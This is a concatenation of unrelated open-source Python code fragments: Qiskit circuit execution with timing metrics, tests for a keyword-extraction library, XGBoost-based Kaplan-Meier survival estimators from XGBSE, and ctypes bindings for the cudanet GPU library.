noise_model=this_noise, basis_gates=this_noise.basis_gates)
if verbose_time:
print(f" *** qiskit.execute() time = {time.time() - st}")
# Initiate excution for all other backends and noiseless simulator
else:
#print(f"... executing on backend: {backend.name()}")
# use execution options if set for backend
if backend_exec_options != None:
optimization_level = 1
if "optimization_level" in backend_exec_options:
optimization_level = backend_exec_options["optimization_level"]
layout_method = None
if "layout_method" in backend_exec_options:
layout_method = backend_exec_options["layout_method"]
routing_method = None
if "routing_method" in backend_exec_options:
routing_method = backend_exec_options["routing_method"]
#job = execute(circuit["qc"], backend, shots=shots,
# the 'execute' method includes transpile, use transpile + run instead (to enable time metrics)
st = time.time()
trans_qc = transpile(circuit["qc"], backend,
optimization_level=optimization_level,
layout_method=layout_method,
routing_method=routing_method)
if verbose_time:
print(f" *** qiskit.transpile() time = {time.time() - st}")
# apply transformer pass if provided
if "transformer" in backend_exec_options:
st = time.time()
#print("... applying transformer!")
trans_qc2 = backend_exec_options["transformer"](trans_qc, backend)
trans_qc = trans_qc2
# if transformer results in multiple circuits, divide shot count
# results will be accumulated in job_complete
# NOTE: this will need to set a flag to distinguish from multiple circuit execution
if len(trans_qc) > 1:
shots = int(shots / len(trans_qc))
if verbose_time:
print(f" *** transformer() time = {time.time() - st}")
st = time.time()
job = backend.run(trans_qc, shots=shots)
if verbose_time:
print(f" *** qiskit.run() time = {time.time() - st}")
# execute with no options set
else:
st = time.time()
job = execute(circuit["qc"], backend, shots=shots)
if verbose_time:
print(f" *** qiskit.execute() time = {time.time() - st}")
# there appears to be no reason to do transpile, as it is done automatically
# DEVNOTE: this prevents us from measuring transpile time
# If we use this method, we'd need to validate on all backends again, so leave for now
#qc = transpile(circuit["qc"], backend)
#job = execute(qc, backend, shots=shots)
except Exception as e:
print(f'ERROR: Failed to execute circuit {active_circuit["group"]} {active_circuit["circuit"]}')
print(f"... exception = {e}")
return
# print("Job status is ", job.status() )
# put job into the active circuits with circuit info
active_circuits[job] = active_circuit
# print("... active_circuit = ", str(active_circuit))
# store circuit dimensional metrics
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'depth', qc_depth)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'size', qc_size)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'xi', qc_xi)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'tr_depth', qc_tr_depth)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'tr_size', qc_tr_size)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'tr_xi', qc_tr_xi)
# return, so caller can do other things while waiting for jobs to complete
# deprecated code ...
'''
# wait until job is complete
job_wait_for_completion(job)
##############
# Here we complete the job immediately
job_complete(job)
'''
if verbose:
print(f"... executing job {job.job_id()}")
# Process a completed job
def job_complete(job):
active_circuit = active_circuits[job]
if verbose:
print(f'\n... job complete - group={active_circuit["group"]} id={active_circuit["circuit"]} shots={active_circuit["shots"]}')
# compute elapsed time for circuit; assume exec is same, unless obtained from result
elapsed_time = time.time() - active_circuit["launch_time"]
# report exec time as 0 unless valid measure returned
exec_time = 0.0
# get job result (DEVNOTE: this might be different for diff targets)
result = None
if job.status() == JobStatus.DONE:
result = job.result()
# print("... result = ", str(result))
# get breakdown of execution time, if method exists
# this attribute not available for some providers;
if "time_per_step" in dir(job) and callable(job.time_per_step):
time_per_step = job.time_per_step()
exec_creating_time = (time_per_step["VALIDATING"] - time_per_step["CREATING"]).total_seconds()
exec_validating_time = (time_per_step["QUEUED"] - time_per_step["VALIDATING"]).total_seconds()
exec_queued_time = (time_per_step["RUNNING"] - time_per_step["QUEUED"]).total_seconds()
exec_running_time = (time_per_step["COMPLETED"] - time_per_step["RUNNING"]).total_seconds()
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_creating_time', exec_creating_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_validating_time', exec_validating_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_queued_time', exec_queued_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_running_time', exec_running_time)
else:
time_per_step = {}
exec_creating_time = 0
exec_validating_time = 0
exec_queued_time = 0
exec_running_time = 0
#print("... time_per_step = ", str(time_per_step))
if verbose:
print(f"... exec times, creating = {exec_creating_time}, validating = {exec_validating_time}, queued = {exec_queued_time}, running = {exec_running_time}")
# counts = result.get_counts(qc)
# print("Total counts are:", counts)
# obtain timing info from the results object
result_obj = result.to_dict()
results_obj = result.to_dict()['results'][0]
#print(f"result_obj = {result_obj}")
#print(f"results_obj = {results_obj}")
#print(f'shots = {results_obj["shots"]}')
# get the actual shots and convert to int if it is a string
actual_shots = 0
for experiment in result_obj["results"]:
actual_shots += experiment["shots"]
if type(actual_shots) is str:
actual_shots = int(actual_shots)
if actual_shots != active_circuit["shots"]:
print(f'WARNING: requested shots not equal to actual shots: {active_circuit["shots"]} != {actual_shots} ')
if "time_taken" in result_obj:
exec_time = result_obj["time_taken"]
elif "time_taken" in results_obj:
exec_time = results_obj["time_taken"]
# remove from list of active circuits
del active_circuits[job]
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'elapsed_time', elapsed_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_time', exec_time)
# If a result handler has been established, invoke it here with result object
if result != None and result_handler:
# The following computes the counts by summing them up, allowing for the case where
# <result> contains results from multiple circuits
# DEVNOTE: This will need to change; currently the only case where we have multiple result counts
# is when using randomly_compile; later, there will be other cases
if type(result.get_counts()) == list:
total_counts = dict()
for count in result.get_counts():
total_counts = dict(Counter(total_counts) + Counter(count))
# make a copy of the result object so we can return a modified version
orig_result = result
result = copy.copy(result)
# replace the results array with an array containing only the first results object
# then populate other required fields
results = copy.copy(result.results[0])
results.header.name = active_circuit["qc"].name # needed to identify the original circuit
results.shots = actual_shots
results.data.counts = total_counts
result.results = [ results ]
try:
result_handler(active_circuit["qc"],
result,
active_circuit["group"],
active_circuit["circuit"],
active_circuit["shots"]
)
except Exception as e:
print(f'ERROR: failed to execute result_handler for circuit {active_circuit["group"]} {active_circuit["circuit"]}')
print(f"... exception = {e}")
# Process a job, whose status cannot be obtained
def job_status_failed(job):
active_circuit = active_circuits[job]
if verbose:
print(f'\n... job status failed - group={active_circuit["group"]} id={active_circuit["circuit"]} shots={active_circuit["shots"]}')
# compute elapsed time for circuit; assume exec is same, unless obtained from result
elapsed_time = time.time() - active_circuit["launch_time"]
# report exec time as 0 unless valid measure returned
exec_time = 0.0
# remove from list of active circuits
del active_circuits[job]
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'elapsed_time', elapsed_time)
metrics.store_metric(active_circuit["group"], active_circuit["circuit"], 'exec_time', exec_time)
######################################################################
# JOB MANAGEMENT METHODS
# Job management involves coordinating the batching, queueing,
# and completion processing of circuits that are submitted for execution.
# Throttle the execution of active and batched jobs.
# Wait for active jobs to complete. As each job completes,
# check if there are any batched circuits waiting to be executed.
# If so, execute them, removing them from the batch.
# Execute the user-supplied completion handler to allow user to
# check if a group of circuits has been completed and report on results.
# Then, if there are no more circuits | |
assert S0021999113005652_key_terms[9][0] == "environmental"
assert S0021999113005652_key_terms[9][1] == "impact"
assert S0021999113005652_key_terms[16][0] == "by(24)cb⁎ =∫01〈cb⁎〉(z⁎)dz⁎"
assert S0021999113005652_key_terms[16][1] == "fig"
def test_get_longer_terms(self):
candidate_term1 = ["real", "time"]
candidate_term2 = ["floating", "point"]
longer_terms = [["real", "time", "clock"],
["real", "time", "expert", "system"],
["real", "time", "image", "generation"],
["real", "time", "output"],
["real", "time", "system"],
["floating", "point", "arithmetic"],
["floating", "point", "constant"],
["floating", "point", "operation"],
["floating", "point", "routine"]]
candidate_term1_longer_terms = GCValue._get_longer_terms(candidate_term1, longer_terms)
assert len(candidate_term1_longer_terms) == 5
assert candidate_term1_longer_terms == [['real', 'time', 'clock'],
['real', 'time', 'expert', 'system'],
['real', 'time', 'image', 'generation'],
['real', 'time', 'output'],
['real', 'time', 'system']]
candidate_term2_longer_terms = GCValue._get_longer_terms(candidate_term2, longer_terms)
assert len(candidate_term2_longer_terms) == 4
assert candidate_term2_longer_terms == [["floating", "point", "arithmetic"],
["floating", "point", "constant"],
["floating", "point", "operation"],
["floating", "point", "routine"]]
#gc_value = GCValue()
#gc_value.weighing({"real": 1.0, "time":1.2, "clock":2.1, "expert":3.1, "system":4.1, "image":1.12,
# "generation":1.4, "output":2.1, "floating":0.3, "point": 0.8, "arithmetic": 0.3},
# longer_terms)
@ignore_warnings
def test_keywords_extraction(self):
example_abstract = "Compatibility of systems of linear constraints over the set of natural numbers. " \
"Criteria of compatibility of a system of linear Diophantine equations, strict inequations, " \
"and nonstrict inequations are considered. Upper bounds for components of a minimal set of " \
"solutions and algorithms of construction of minimal generating sets of solutions for all " \
"types of systems are given. These criteria and the corresponding algorithms for " \
"constructing a minimal supporting set of solutions can be used in solving all the " \
"considered types systems and systems of mixed types."
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, weight_comb="sum")
print("extracted keywords:"+ str(results))
print("top_vertices: ", top_vertices)
assert 13 == len(results)
term_list = [term[0] for term in results]
assert "linear diophantine equations" == term_list[0]
assert "minimal supporting set" == term_list[1]
assert "minimal set" == term_list[2]
assert "types systems" == term_list[3]
assert "linear constraints" == term_list[4]
assert "strict inequations" == term_list[5]
assert "systems" == term_list[6]
assert "corresponding algorithms" == term_list[7]
assert "nonstrict inequations" == term_list[8]
assert "set" in term_list
assert "minimal" in term_list
assert "algorithms" in term_list
assert "solutions" in term_list
assert "natural numbers" not in term_list
assert 'linear' == top_vertices[0][0]
assert 'systems' == top_vertices[1][0]
assert 'set' == top_vertices[2][0]
assert 'minimal' == top_vertices[3][0]
assert 'equations' == top_vertices[4][0]
assert 'algorithms' == top_vertices[5][0]
assert 'solutions' == top_vertices[6][0]
assert 'inequations' == top_vertices[7][0]
print("after enabling lemmatization....")
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, lemma=True, weight_comb="sum")
assert 12 == len(results)
print("extracted keywords after lemmatization: ", results)
print("top_vertices after lemmatization: ", top_vertices)
term_list = [term[0] for term in results]
assert "minimal supporting set" == term_list[0]
assert "linear diophantine equation" == term_list[1]
assert "minimal set" == term_list[2]
assert "type system" == term_list[3]
assert "linear constraint" == term_list[4]
assert "strict inequations" == term_list[5]
assert "system" == term_list[6]
assert "corresponding algorithm" == term_list[7]
assert "nonstrict inequations" == term_list[8]
assert 'system' == top_vertices[0][0]
assert 'set' == top_vertices[1][0]
assert 'linear' == top_vertices[2][0]
assert 'algorithm' == top_vertices[3][0]
assert 'equation' == top_vertices[4][0]
assert 'minimal' == top_vertices[5][0]
assert 'inequations' == top_vertices[6][0]
def test_keywords_extraction2(self):
"""
test keywords extraction with example nodes (with custom syntactic filters and step list) in the paper
"""
example_abstract = "Compatibility of systems of linear constraints over the set of natural numbers. " \
"Criteria of compatibility of a system of linear Diophantine equations, strict inequations, " \
"and nonstrict inequations are considered. Upper bounds for components of a minimal set of " \
"solutions and algorithms of construction of minimal generating sets of solutions for all " \
"types of systems are given. These criteria and the corresponding algorithms for " \
"constructing a minimal supporting set of solutions can be used in solving all the " \
"considered types systems and systems of mixed types."
custom_categories = {'NNS', 'NNP', 'NN', 'JJ', 'VBZ'}
# manually filter few nodes not appearing in the given example of original paper
stop_words={'set', 'mixed', 'corresponding', 'supporting'}
ranked_terms, top_vertices = keywords_extraction(example_abstract, top_p = 1, top_t=None, directed=False,
syntactic_categories=custom_categories, stop_words=stop_words, weight_comb="sum")
print("ranked terms with custom filters 1: ", ranked_terms)
print("top_vertices with custom filters 1: ", top_vertices)
top_vertices_names = [top_vertex[0] for top_vertex in top_vertices]
assert 'supporting' not in top_vertices_names
assert 'corresponding' not in top_vertices_names
assert 'mixed' not in top_vertices_names
assert 'set' not in top_vertices_names
assert 'linear diophantine equations' == ranked_terms[0][0]
assert 'linear constraints' == ranked_terms[1][0]
assert 'types systems' == ranked_terms[2][0]
assert 'upper bounds' == ranked_terms[3][0]
assert 'strict inequations' == ranked_terms[4][0]
assert 'natural numbers' == ranked_terms[5][0]
assert 'systems' == ranked_terms[6][0]
assert 'nonstrict inequations' == ranked_terms[7][0]
assert 'compatibility' == ranked_terms[8][0]
assert 'construction' == ranked_terms[9][0] or 'minimal' == ranked_terms[9][0] \
or 'algorithms' == ranked_terms[9][0] or 'solutions' == ranked_terms[9][0] \
or 'sets' == ranked_terms[9][0]
# >>> [('linear diophantine equations', 0.19805), ('linear constraints', 0.12147),
# ('types systems', 0.10493), ('upper bounds', 0.10114), ('strict inequations', 0.09432),
# ('natural numbers', 0.09091), ('systems', 0.08092), ('nonstrict inequations', 0.07741),
# ('compatibility', 0.04666), ('algorithms', 0.04545), ('minimal', 0.04545),
# ('construction', 0.04545), ('sets', 0.04545), ('solutions', 0.04545),
# ('components', 0.03522), ('criteria', 0.02665), ('types', 0.02401), ('system', 0.02348)]
stop_words={'set', 'mixed', 'corresponding', 'supporting', "minimal"}
ranked_terms, top_vertices = keywords_extraction(example_abstract, top_p = 1, top_t=None, directed=False,
syntactic_categories=custom_categories, stop_words=stop_words)
print("ranked terms with custom filters 2: ", ranked_terms)
print("top_vertices with custom filters 2: ", top_vertices)
top_vertices_names = [top_vertex[0] for top_vertex in top_vertices]
assert 'minimal' not in top_vertices_names
assert 'supporting' not in top_vertices_names
assert 'corresponding' not in top_vertices_names
assert 'mixed' not in top_vertices_names
assert 'set' not in top_vertices_names
# [('linear diophantine equations', 0.20748), ('linear constraints', 0.12726), ('types systems', 0.10992),
# ('upper bounds', 0.10596), ('strict inequations', 0.09881), ('natural numbers', 0.09524),
# ('systems', 0.08477), ('nonstrict inequations', 0.0811), ('solutions', 0.06182), ('algorithms', 0.06182),
# ('compatibility', 0.04889), ('components', 0.0369), ('sets', 0.03342), ('construction', 0.03342),
# ('criteria', 0.02792), ('types', 0.02516), ('system', 0.02459)]
def test_keywords_extraction3(self):
"""
test with different pagerank algorithms
"""
example_abstract = "Compatibility of systems of linear constraints over the set of natural numbers. " \
"Criteria of compatibility of a system of linear Diophantine equations, strict inequations, " \
"and nonstrict inequations are considered. Upper bounds for components of a minimal set of " \
"solutions and algorithms of construction of minimal generating sets of solutions for all " \
"types of systems are given. These criteria and the corresponding algorithms for " \
"constructing a minimal supporting set of solutions can be used in solving all the " \
"considered types systems and systems of mixed types."
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="pagerank_numpy", weight_comb="sum")
print("ranked terms computed with 'pagerank_numpy': ", results)
print("top_vertices computed with 'pagerank_numpy': ", top_vertices)
assert len(results) == 13
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="pagerank_scipy", weight_comb="sum")
print("ranked terms computed with 'pagerank_scipy': ", results)
print("top_vertices computed with 'pagerank_scipy': ", top_vertices)
assert len(results) == 13
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="betweenness_centrality", weight_comb="sum")
print("ranked terms computed with 'betweenness_centrality': ", results)
print("top_vertices computed with 'betweenness_centrality': ", top_vertices)
assert len(results) == 11
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="degree_centrality", weight_comb="sum")
print("ranked terms computed with 'degree_centrality': ", results)
print("top_vertices computed with 'degree_centrality': ", top_vertices)
assert top_vertices[0][0] == 'systems'
assert top_vertices[1][0] == 'linear'
assert top_vertices[2][0] == 'minimal' or top_vertices[2][0] == 'set'
# top 30% results is not stable for degree_centrality
# assert len(results) == 11 or len(results) == 12
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="hits", weight_comb="sum")
print("ranked terms computed with 'hits': ", results)
print("top_vertices computed with 'hits': ", top_vertices)
assert top_vertices[0][0] == 'systems'
assert top_vertices[1][0] == 'linear'
assert top_vertices[2][0] == 'mixed' or top_vertices[2][0] == 'types'
assert top_vertices[4][0] == 'equations'
assert len(results) == 7 or len(results) == 8
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="closeness_centrality", weight_comb="sum")
print("ranked terms computed with 'closeness_centrality': ", results)
print("top_vertices computed with 'closeness_centrality': ", top_vertices)
assert len(results) == 10 or len(results) == 11
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="edge_betweenness_centrality", weight_comb="sum")
print("ranked terms computed with 'edge_betweenness_centrality': ", results)
print("top_vertices computed with 'edge_betweenness_centrality': ", top_vertices)
assert len(results) == 8 or len(results) == 10
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="eigenvector_centrality", max_iter=1000, weight_comb="sum")
print("ranked terms computed with 'eigenvector_centrality': ", results)
print("top_vertices computed with 'eigenvector_centrality': ", top_vertices)
assert len(results) == 7 or len(results) == 8
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="katz_centrality", | |
import warnings
import numpy as np
import pandas as pd
import xgboost as xgb
import scipy.stats as st
from sklearn.neighbors import BallTree
from xgbse._base import XGBSEBaseEstimator
from xgbse.converters import convert_data_to_xgb_format, convert_y
from xgbse.non_parametric import (
calculate_kaplan_vectorized,
get_time_bins,
calculate_interval_failures,
)
# at which percentiles will the KM predict
KM_PERCENTILES = np.linspace(0, 1, 11)
DEFAULT_PARAMS = {
"objective": "survival:aft",
"eval_metric": "aft-nloglik",
"aft_loss_distribution": "normal",
"aft_loss_distribution_scale": 1,
"tree_method": "hist",
"learning_rate": 5e-2,
"max_depth": 8,
"booster": "dart",
"subsample": 0.5,
"min_child_weight": 50,
"colsample_bynode": 0.5,
}
DEFAULT_PARAMS_TREE = {
"objective": "survival:cox",
"eval_metric": "cox-nloglik",
"tree_method": "exact",
"max_depth": 100,
"booster": "dart",
"subsample": 1.0,
"min_child_weight": 30,
"colsample_bynode": 1.0,
}
# class to turn XGB into a kNN with a kaplan meier in the NNs
class XGBSEKaplanNeighbors(XGBSEBaseEstimator):
"""
## XGBSEKaplanNeighbor
Convert xgboost into a nearest neighbor model, where we use hamming distance to define
similar elements as the ones that co-ocurred the most at the ensemble terminal nodes.
Then, at each neighbor-set compute survival estimates with the Kaplan-Meier estimator.
"""
def __init__(self, xgb_params=DEFAULT_PARAMS, n_neighbors=30, radius=None):
"""
Args:
xgb_params (Dict): parameters for XGBoost model, see
https://xgboost.readthedocs.io/en/latest/parameter.html
n_neighbors (Int): number of neighbors for computing KM estimates
radius (Float): If set, uses a radius around the point for neighbors search
"""
self.xgb_params = xgb_params
self.n_neighbors = n_neighbors
self.radius = radius
self.persist_train = False
self.index_id = None
self.radius = None
def fit(
self,
X,
y,
num_boost_round=1000,
validation_data=None,
early_stopping_rounds=None,
verbose_eval=0,
persist_train=True,
index_id=None,
time_bins=None,
):
"""
Transform feature space by fitting a XGBoost model and outputting its leaf indices.
Build search index in the new space to allow nearest neighbor queries at scoring time.
Args:
X ([pd.DataFrame, np.array]): design matrix to fit XGBoost model
y (structured array(numpy.bool_, numpy.number)): binary event indicator as first field,
and time of event or time of censoring as second field.
num_boost_round (Int): Number of boosting iterations.
validation_data (Tuple): Validation data in the format of a list of tuples [(X, y)]
if user desires to use early stopping
early_stopping_rounds (Int): Activates early stopping.
Validation metric needs to improve at least once
in every **early_stopping_rounds** round(s) to continue training.
See xgboost.train documentation.
verbose_eval ([Bool, Int]): level of verbosity. See xgboost.train documentation.
persist_train (Bool): whether or not to persist training data to use explainability
through prototypes
index_id (pd.Index): user defined index if intended to use explainability
through prototypes
time_bins (np.array): specified time windows to use when making survival predictions
Returns:
XGBSEKaplanNeighbors: fitted instance of XGBSEKaplanNeighbors
"""
self.E_train, self.T_train = convert_y(y)
if time_bins is None:
time_bins = get_time_bins(self.T_train, self.E_train)
self.time_bins = time_bins
# converting data to xgb format
dtrain = convert_data_to_xgb_format(X, y, self.xgb_params["objective"])
# converting validation data to xgb format
evals = ()
if validation_data:
X_val, y_val = validation_data
dvalid = convert_data_to_xgb_format(
X_val, y_val, self.xgb_params["objective"]
)
evals = [(dvalid, "validation")]
# training XGB
self.bst = xgb.train(
self.xgb_params,
dtrain,
num_boost_round=num_boost_round,
early_stopping_rounds=early_stopping_rounds,
evals=evals,
verbose_eval=verbose_eval,
)
# creating nearest neighbor index
leaves = self.bst.predict(dtrain, pred_leaf=True)
self.tree = BallTree(leaves, metric="hamming", leaf_size=40)
if persist_train:
self.persist_train = True
if index_id is None:
index_id = X.index.copy()
self.index_id = index_id
return self
def predict(
self,
X,
time_bins=None,
return_ci=False,
ci_width=0.683,
return_interval_probs=False,
):
"""
Make queries to nearest neighbor search index build on the transformed XGBoost space.
Compute a Kaplan-Meier estimator for each neighbor-set. Predict the KM estimators.
Args:
X (pd.DataFrame): data frame with samples to generate predictions
time_bins (np.array): specified time windows to use when making survival predictions
return_ci (Bool): whether to return confidence intervals via the Exponential Greenwood formula
ci_width (Float): width of confidence interval
return_interval_probs (Bool): Boolean indicating if interval probabilities are
supposed to be returned. If False the cumulative survival is returned.
Returns:
(pd.DataFrame): A dataframe of survival probabilities
for all times (columns), from a time_bins array, for all samples of X
(rows). If return_interval_probs is True, the interval probabilities are returned
instead of the cumulative survival probabilities.
upper_ci (np.array): upper confidence interval for the survival
probability values
lower_ci (np.array): lower confidence interval for the survival
probability values
"""
# converting to xgb format
d_matrix = xgb.DMatrix(X)
# getting leaves and extracting neighbors
leaves = self.bst.predict(d_matrix, pred_leaf=True)
if self.radius:
assert self.radius > 0, "Radius must be positive"
neighs, _ = self.tree.query_radius(
leaves, r=self.radius, return_distance=True
)
number_of_neighbors = np.array([len(neigh) for neigh in neighs])
if np.argwhere(number_of_neighbors == 1).shape[0] > 0:
# If there is at least one sample without neighbors apart from itself
# a warning is raised suggesting a radius increase
warnings.warn(
"Warning: Some samples don't have neighbors apart from itself. Increase the radius",
RuntimeWarning,
)
else:
_, neighs = self.tree.query(leaves, k=self.n_neighbors)
# gathering times and events/censors for neighbor sets
T_neighs = self.T_train[neighs]
E_neighs = self.E_train[neighs]
# vectorized (very fast!) implementation of Kaplan Meier curves
if time_bins is None:
time_bins = self.time_bins
# calculating z-score from width
z = st.norm.ppf(0.5 + ci_width / 2)
preds_df, upper_ci, lower_ci = calculate_kaplan_vectorized(
T_neighs, E_neighs, time_bins, z
)
if return_ci and return_interval_probs:
raise ValueError(
"Confidence intervals for interval probabilities is not supported. Choose between return_ci and return_interval_probs."
)
if return_interval_probs:
preds_df = calculate_interval_failures(preds_df)
return preds_df
if return_ci:
return preds_df, upper_ci, lower_ci
return preds_df
def _align_leaf_target(neighs, target):
# getting times and events for each leaf element
target_neighs = neighs.apply(lambda x: target[x])
# converting to vectorized kaplan format
# filling nas due to different leaf sizes with 0
target_neighs = (
pd.concat([pd.DataFrame(e) for e in target_neighs.values], axis=1)
.T.fillna(0)
.values
)
return target_neighs
# class to turn XGB into a kNN with a kaplan meier in the NNs
class XGBSEKaplanTree(XGBSEBaseEstimator):
"""
## XGBSEKaplanTree
Single tree implementation as a simplification to `XGBSEKaplanNeighbors`.
Instead of doing nearest neighbor searches, fit a single tree via `xgboost`
and calculate KM curves at each of its leaves.
"""
def __init__(
self,
xgb_params=DEFAULT_PARAMS_TREE,
):
self.xgb_params = xgb_params
self.persist_train = False
self.index_id = None
"""
Args:
xgb_params (Dict): parameters for fitting the tree, see
https://xgboost.readthedocs.io/en/latest/parameter.html
"""
def fit(
self,
X,
y,
persist_train=True,
index_id=None,
time_bins=None,
ci_width=0.683,
**xgb_kwargs,
):
"""
Fit a single decision tree using xgboost. For each leaf in the tree,
build a Kaplan-Meier estimator.
Args:
X ([pd.DataFrame, np.array]): design matrix to fit XGBoost model
y (structured array(numpy.bool_, numpy.number)): binary event indicator as first field,
and time of event or time of censoring as second field.
persist_train (Bool): whether or not to persist training data to use explainability
through prototypes
index_id (pd.Index): user defined index if intended to use explainability
through prototypes
time_bins (np.array): specified time windows to use when making survival predictions
ci_width (Float): width of confidence interval
Returns:
XGBSEKaplanTree: Trained instance of XGBSEKaplanTree
"""
E_train, T_train = convert_y(y)
if time_bins is None:
time_bins = get_time_bins(T_train, E_train)
self.time_bins = time_bins
# converting data to xgb format
dtrain = convert_data_to_xgb_format(X, y, self.xgb_params["objective"])
# training XGB
self.bst = xgb.train(self.xgb_params, dtrain, num_boost_round=1, **xgb_kwargs)
# getting leaves
leaves = self.bst.predict(dtrain, pred_leaf=True)
# organizing elements per leaf
leaf_neighs = (
pd.DataFrame({"leaf": leaves})
.groupby("leaf")
.apply(lambda x: list(x.index))
)
# getting T and E for each leaf
T_leaves = _align_leaf_target(leaf_neighs, T_train)
E_leaves = _align_leaf_target(leaf_neighs, E_train)
# calculating z-score from width
z = st.norm.ppf(0.5 + ci_width / 2)
# vectorized (very fast!) implementation of Kaplan Meier curves
(
self._train_survival,
self._train_upper_ci,
self._train_lower_ci,
) = calculate_kaplan_vectorized(T_leaves, E_leaves, time_bins, z)
# adding leaf indexes
self._train_survival = self._train_survival.set_index(leaf_neighs.index)
self._train_upper_ci = self._train_upper_ci.set_index(leaf_neighs.index)
self._train_lower_ci = self._train_lower_ci.set_index(leaf_neighs.index)
if persist_train:
self.persist_train = True
if index_id is None:
index_id = X.index.copy()
self.tree = BallTree(leaves.reshape(-1, 1), metric="hamming", leaf_size=40)
self.index_id = index_id
return self
def predict(self, X, return_ci=False, return_interval_probs=False):
"""
Run samples through tree until terminal nodes. Predict the Kaplan-Meier
estimator associated to the leaf node each sample ended into.
Args:
X (pd.DataFrame): data frame with samples to generate predictions
return_ci (Bool): whether to return confidence intervals via the Exponential Greenwood formula
return_interval_probs (Bool): Boolean indicating if interval probabilities are
supposed to be returned. If False the cumulative survival is returned.
Returns:
preds_df (pd.DataFrame): A dataframe of survival probabilities
for all times (columns), from a time_bins array, for all samples of X
(rows). If return_interval_probs is True, the interval probabilities are returned
instead of the cumulative survival probabilities.
upper_ci (np.array): upper confidence interval for the survival
| |
<filename>cudanet/cudanet.py
# ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc. All rights reserved.
# ----------------------------------------------------------------------------
import os
import ctypes as ct
import ctypes.util
from ctypes import pythonapi
import numpy as np
MAX_ONES = 1024*256
cudanet_lib_path = ct.util.find_library('cconv2_cudanet')
if cudanet_lib_path is None:
raise OSError("Problems locating libcudanet shared library")
_cudanet = ct.cdll.LoadLibrary(cudanet_lib_path)
_cudanet.get_last_cuda_error.restype = ct.c_char_p
_cudanet.cublas_init.restype = ct.c_int
_cudanet.cublas_shutdown.restype = ct.c_int
_cudanet.cuda_set_device.restype = ct.c_int
_cudanet.init_empty.restype = ct.c_int
# _cudanet.reshape.restype = ct.c_int
_cudanet.copy_to_host.restype = ct.c_int
_cudanet.copy_from.restype = ct.c_int
_cudanet.set_host_mat.restype = ct.c_int
_cudanet.allocate_device_memory = ct.c_int
_cudanet.copy_to_device.restype = ct.c_int
_cudanet.copy_on_device.restype = ct.c_int
_cudanet.free_device_memory.restype = ct.c_int
_cudanet.add_elementwise.restype = ct.c_int
_cudanet.add_scalar.restype = ct.c_int
_cudanet.add_vector.restype = ct.c_int
_cudanet.mat_vector_op.restype = ct.c_int
_cudanet.assign_scalar.restype = ct.c_int
_cudanet.subtract_elementwise.restype = ct.c_int
_cudanet.divide_elementwise.restype = ct.c_int
_cudanet.mult_elementwise.restype = ct.c_int
_cudanet.mult_by_scalar.restype = ct.c_int
_cudanet.sign.restype = ct.c_int
_cudanet.apply_sigmoid.restype = ct.c_int
_cudanet.apply_tanh.restype = ct.c_int
_cudanet.apply_soft_threshold.restype = ct.c_int
_cudanet.apply_abs.restype = ct.c_int
_cudanet.apply_log_1_plus_exp.restype = ct.c_int
_cudanet.apply_gamma.restype = ct.c_int
_cudanet.apply_lgamma.restype = ct.c_int
_cudanet.apply_log.restype = ct.c_int
_cudanet.apply_clip_range.restype = ct.c_int
_cudanet.apply_exp.restype = ct.c_int
_cudanet.apply_sqrt.restype = ct.c_int
_cudanet.apply_pow.restype = ct.c_int
_cudanet.apply_pow_matrix.restype = ct.c_int
_cudanet.reciprocal.restype = ct.c_int
_cudanet.convolution.restype = ct.c_int
_cudanet.print_devmat.restype = ct.c_int
_cudanet.get_col_slice_view.restype = ct.c_int
_cudanet.get_col_slice_copy.restype = ct.c_int
_cudanet.set_col_slice.restype = ct.c_int
_cudanet.get_row_slice_view.restype = ct.c_int
_cudanet.get_row_slice_copy.restype = ct.c_int
_cudanet.set_row_slice.restype = ct.c_int
_cudanet.assign_col_slice.restype = ct.c_int
_cudanet.assign_row_slice.restype = ct.c_int
_cudanet.euclid_norm.restype = ct.c_float
_cudanet.manhattan_norm.restype = ct.c_float
_cudanet.vdot.restype = ct.c_float
_cudanet.dot.restype = ct.c_int
_cudanet.less_than.restype = ct.c_int
_cudanet.less_than_scalar.restype = ct.c_int
_cudanet.greater_than.restype = ct.c_int
_cudanet.greater_than_scalar.restype = ct.c_int
_cudanet.equals.restype = ct.c_int
_cudanet.equals_scalar.restype = ct.c_int
_cudanet.minimum.restype = ct.c_int
_cudanet.minimum_scalar.restype = ct.c_int
_cudanet.maximum.restype = ct.c_int
_cudanet.maximum_scalar.restype = ct.c_int
_cudanet.reshape.restype = ct.c_int
_cudanet.add_col_vec.restype = ct.c_int
_cudanet.add_col_mult.restype = ct.c_int
_cudanet.add_row_vec.restype = ct.c_int
_cudanet.mult_by_col_vec.restype = ct.c_int
_cudanet.mult_by_row_vec.restype = ct.c_int
_cudanet.divide_by_col_vec.restype = ct.c_int
_cudanet.divide_by_row_vec.restype = ct.c_int
_cudanet.max_by_axis.restype = ct.c_int
_cudanet.min_by_axis.restype = ct.c_int
_cudanet.sum.restype = ct.c_int
_cudanet.sumsq.restype = ct.c_int
_cudanet.mean.restype = ct.c_int
_cudanet.convolution_back_errors.restype = ct.c_int
